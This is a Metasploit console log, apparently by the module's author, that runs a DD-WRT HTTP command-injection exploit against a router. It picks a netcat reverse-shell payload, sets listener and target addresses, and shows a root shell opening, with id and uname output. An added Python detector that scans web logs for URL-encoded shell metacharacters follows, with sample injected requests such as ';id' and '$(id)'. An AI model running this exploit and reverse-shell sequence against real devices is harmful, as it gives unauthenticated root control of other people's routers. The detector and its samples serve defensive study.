msf3$ svn up
A    modules/exploits/windows/smb/netidentity_xtierrpcpipe.rb
Updated to revision 6852.
hdm@vorpal:/downloads/msf19$ ./msfconsole 

                |                    |      _) |   
 __ `__ \   _ \ __|  _` |  __| __ \  |  _ \  | __| 
 |   |   |  __/ |   (   |\__ \ |   | | (   | | |   
_|  _|  _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__| 
                              _|                   


       =[ msf v3.3-dev
+ -- --=[ 401 exploits - 234 payloads
+ -- --=[ 20 encoders - 7 nops
       =[ 176 aux

msf > use exploit/linux/http/ddwrt_cgibin_exec 
msf exploit(ddwrt_cgibin_exec) > info 

       Name: DD-WRT HTTP Daemon Arbitrary Command Execution
    Version: 6852
   Platform: Unix
 Privileged: No
    License: Metasploit Framework License (BSD)

Provided by:
  hdm <[email protected]>

Available targets:
  Id  Name              
  --  ----              
  0   Automatic Target  

Basic options:
  Name   Current Setting  Required  Description         
  ----   ---------------  --------  -----------         
  RHOST  192.168.0.10     yes       The target address  
  RPORT  80               yes       The target port     

Payload information:
  Space: 1024

Description:
  This module abuses a metacharacter injection vulnerability in the 
  HTTP management server of wireless gateways running DD-WRT. This 
  flaw allows an unauthenticated attacker to execute arbitrary 
  commands as the root user account.

References:
  http://www.securityfocus.com/bid/35742
  http://www.milw0rm.com/exploits/9209

msf exploit(ddwrt_cgibin_exec) > show payloads 

Compatible payloads
===================

   Name                       Description                                      
   ----                       -----------                                      
   cmd/unix/bind_netcat       Unix Command Shell, Bind TCP (via netcat -e)     
   cmd/unix/bind_perl         Unix Command Shell, Bind TCP (via perl)          
   cmd/unix/bind_ruby         Unix Command Shell, Bind TCP (via Ruby)          
   cmd/unix/generic           Unix Command, Generic command execution          
   cmd/unix/reverse           Unix Command Shell, Double reverse TCP (telnet)  
   cmd/unix/reverse_bash      Unix Command Shell, Reverse TCP (/dev/tcp)       
   cmd/unix/reverse_netcat    Unix Command Shell, Reverse TCP (via netcat -e)  
   cmd/unix/reverse_perl      Unix Command Shell, Reverse TCP (via perl)       
   cmd/unix/reverse_ruby      Unix Command Shell, Reverse TCP (via Ruby)       
   generic/shell_bind_tcp     Generic Command Shell, Bind TCP Inline           
   generic/shell_reverse_tcp  Generic Command Shell, Reverse TCP Inline        

msf exploit(ddwrt_cgibin_exec) > set PAYLOAD cmd/unix/reverse_netcat
PAYLOAD => cmd/unix/reverse_netcat
msf exploit(ddwrt_cgibin_exec) > set LHOST 192.168.0.139 
LHOST => 192.168.0.139
msf exploit(ddwrt_cgibin_exec) > set LPORT 4444 
LPORT => 4444
msf exploit(ddwrt_cgibin_exec) > set RHOST 192.168.0.10
RHOST => 192.168.0.10
msf exploit(ddwrt_cgibin_exec) > exploit

[*] Handler binding to LHOST 0.0.0.0
[*] Started reverse handler
[*] Sending GET request with encoded command line...
[*] Command shell session 1 opened (192.168.0.139:4444 -> 192.168.0.10:2057)

id
uid=0(root) gid=0(root)
uname -a
Linux wifi1 2.4.36 #308 Sun Jul 27 16:11:05 CEST 2008 mips unknown
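
The module description above says the flaw is metacharacter injection in the DD-WRT management HTTP server, and the session log shows the command going out URL-encoded in a single GET request. As an added example (not from the page and not part of the Metasploit module), here is a Python detector that scans web-server access logs for shell metacharacters in request URIs. It decodes the URI repeatedly so that single- and double-URL-encoded injections are both caught, and it inspects the path and the query string with different character sets so that an ordinary `a=1&b=2` query is not flagged. The log lines, timestamps and paths are constructed for the example; the Common Log Format layout is an assumption about the target's logging.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines (Common Log Format); none come from the page.
# Line 3 carries a URL-encoded ";" chain in the path, line 4 the same thing
# double-encoded, line 5 a "$(...)" substitution inside a query value.
SAMPLE_LOG = """\
192.168.0.139 - - [01/Jan/2010:00:00:01 +0000] "GET /index.asp HTTP/1.1" 200 5120
192.168.0.139 - - [01/Jan/2010:00:00:02 +0000] "GET /cgi-bin/status.cgi?page=1&view=2 HTTP/1.1" 200 810
192.168.0.139 - - [01/Jan/2010:00:00:05 +0000] "GET /cgi-bin/%3Bid%3Buname%20-a HTTP/1.1" 200 0
192.168.0.139 - - [01/Jan/2010:00:00:06 +0000] "GET /cgi-bin/%253Bid HTTP/1.1" 404 0
192.168.0.139 - - [01/Jan/2010:00:00:07 +0000] "GET /cgi-bin/x.cgi?cmd=%24%28id%29 HTTP/1.1" 200 0
192.168.0.139 - - [01/Jan/2010:00:00:09 +0000] "GET /style.css HTTP/1.1" 200 2200
"""

# Common Log Format: src ident user [ts] "method uri proto" status size
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<uri>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)$'
)

# In the path, "&" has no legitimate role, so it counts as a metacharacter there.
PATH_META = re.compile(r'[;|&`\n\r<>]|\$\(|\$\{')
# In the query string "&" separates parameters, so only look for the operators
# that still mean something to a shell.
QUERY_META = re.compile(r'[;|`\n\r]|\$\(|\$\{')


def fully_decode(s: str, max_rounds: int = 3) -> str:
    """URL-decode until the string stops changing (bounded), so that
    double-encoded payloads such as %253B are reduced to ';' too."""
    for _ in range(max_rounds):
        decoded = unquote(s)
        if decoded == s:
            return s
        s = decoded
    return s


def metachar_hits(uri: str):
    """Return (decoded_uri, sorted list of metacharacter tokens found)."""
    decoded = fully_decode(uri)
    path, _, query = decoded.partition('?')
    hits = {m.group(0) for m in PATH_META.finditer(path)}
    hits |= {m.group(0) for m in QUERY_META.finditer(query)}
    return decoded, sorted(hits)


def scan_log(text: str):
    """Parse CLF lines and report every request whose decoded URI contains
    shell metacharacters. Unparseable lines are skipped, not treated as hits."""
    findings = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded, hits = metachar_hits(m.group('uri'))
        if hits:
            findings.append({
                'src': m.group('src'),
                'ts': m.group('ts'),
                'uri': m.group('uri'),
                'decoded': decoded,
                'hits': hits,
            })
    return findings


if __name__ == '__main__':
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ts']} {f['src']} {f['uri']} -> {f['decoded']!r} hits={f['hits']}")
```

A request to the management interface whose decoded path carries `;`, `|` or `$(` has no benign explanation on an embedded router, so each hit here is worth an alert on its own rather than a score; the decoder's round limit keeps a crafted `%25%25%25...` string from turning the detector into a CPU sink.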